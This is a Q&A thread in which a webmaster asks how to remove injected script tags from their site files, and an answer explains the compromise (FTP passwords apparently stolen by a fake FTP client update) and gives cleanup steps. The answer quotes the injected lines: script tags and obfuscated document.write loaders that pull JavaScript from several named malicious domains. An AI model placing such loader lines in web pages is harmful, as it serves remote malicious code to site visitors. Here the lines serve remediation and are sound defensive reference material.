how can i remove script virus from my script

Question

i have following code added automatically into my script...

<script type="text/javascript" src="http://obscurewax.ru/Kilobyte.js"></script> 
<!--72628eb2e686638651ad69b6a34a630f-->

at the end of my each page when i see source code of my page it shows me the above code but when i open that file in notepad or any editing software it shows me nothing but only my script.. how can i remove that script from all of my files at once...

also let me know why it is happening so far..

Answer 1

Edit 25-Aug :
Specific Domains & entries added(below)
New domain nuttypiano.com spotted.

Edit :
Figured it out. it was definitely Filezilla siphoning of my FTP passwords.
Keep an eye on .htaccess file and file permission -- they seem to change to 777.

---

Happened to me as well. It took all the passwords from the FTP program and then changed the PHP and js files to add the line

<script type="text/javascript" src="http://obscurewax.ru/Queue.js">

Mainly index.* files are targeted other files targeted are *.js files.

I believe the end js file name varies but you can track it from the obscurewax.ru domain.

I have around 8-10 websites where this has happened. Most of my websites are running joomla. In what I have observed as yet, It likes to target the files that start with the word index.

In a joomla install, there were about 122 files affected by this, almost all were in the : joomla_install/administrator
folder.

Its a pain to download a joomla install from the server because its somewhere about 4-5 thousand files. Still, the strategy I am following is this.

Download the entire site on a folder, run a text search(I am using TextCrawler) for : obscurewax.ru

Note the number of files and folders that have this and more importantly note all the the variations of the js file names.

Do a search and replace for all the .js file variations eg :

<script type="text/javascript" src="http://obscurewax.ru/Queue.js">
<script type="text/javascript" src="http://obscurewax.ru/Cablemodem.js">
<script type="text/javascript" src="http://obscurewax.ru/Kilobyte.js">

In the .js files you will also find this type of code :

document.write('<s'+'cript type="text/javascript" 
src="http://obscurewax.ru/AGP.js"></scr'+'ipt>'); // Found in .js files

Replace all with nothing ('').
Another thing you can do is : obscurewax.ru with example.com

I don't have a quick and easy way to remove the code in the comments below it(which I think they are using for tracking purposes.) -- but I think if you remove the script link, that comment is not going to hurt you.

Different domains spotted :

nuttypiano.com(spotted 25-Aug)

pocketbloke.ru

yumeye.ru

microlightning.ru

riotassistance.ru

// Denis125 <[email protected]> (comment in a .js file.)

Specific lines to lookout for :

<script type="text/javascript" src="http://obscurewax.ru/Beta_Software.js"></script>
<script type="text/javascript" src="http://riotassistance.ru/Undo.js"></script>
* Contributed by Open Web Technologies <http://openwebtech.ru/>
Denis125 <[email protected]>
// Author: Andrei Blagorazumov, [email protected]
document.write('<sc'+'ript type="text/javascript" src="http://pocketbloke.ru/Undo.js"></scri'+'pt>');
document.write('<s'+'cript type="text/javascript" src="http://obscurewax.ru/Beta_Software.js"></scr'+'ipt>');
<script type="text/javascript" src="http://nuttypiano.com/Hard_Copy.js"></script>
<script type="text/javascript" src="http://nuttypiano.com/Facebook.js"></script>
document.write('<s'+'cript type="text/javascript" src="http://nuttypiano.com/Facebook.js"></scri'+'pt>');

Note : Sometimes you will not be able to see this link in your html in the source, but, the files gets loaded because its hiding in one of the JavaScripts. A good way to be sure you are really clean is to actually go in and see the .js files that are getting loaded while your page is loading and check if any .js files are loading from the suspected domain. An easy way to do this is go into the developer tools in chrome(ctrl + shift + i) Here in the resources tab you will see the scripts filter, using this you can track all the .js files loading while your page loads. The firebug plugin in firefox will also let you see this info. If your website has several parts(front-end, back-end) you want to visit all the parts of the website and check if any suspicious .js files are getting loaded.

Very importantly

Update your Antivirus scanner and do a full scan on your computer for viruses.

If you are using an FTP program or your code editor has FTP capability you want to visit all the websites for which you have passwords stored and check if they were affected. If your FTP program/editor was compromised -- almost all the websites that you have ftp passwords stored for would have been affected.

Change the passwords for all the ftp accounts that were stored in the programs.

Uninstall the suspect program & use another one or re-download and install it.

This is the worst thing that can happen to a web-developer. This attack is generally done by tricking the victim(you and me) to believe there is an update for the FTP program from within the program, as soon as you install the update -- your sites will get affected.

I am working on this thing right now. If you have any better/shorter ways of doing this. Please share. Thanks!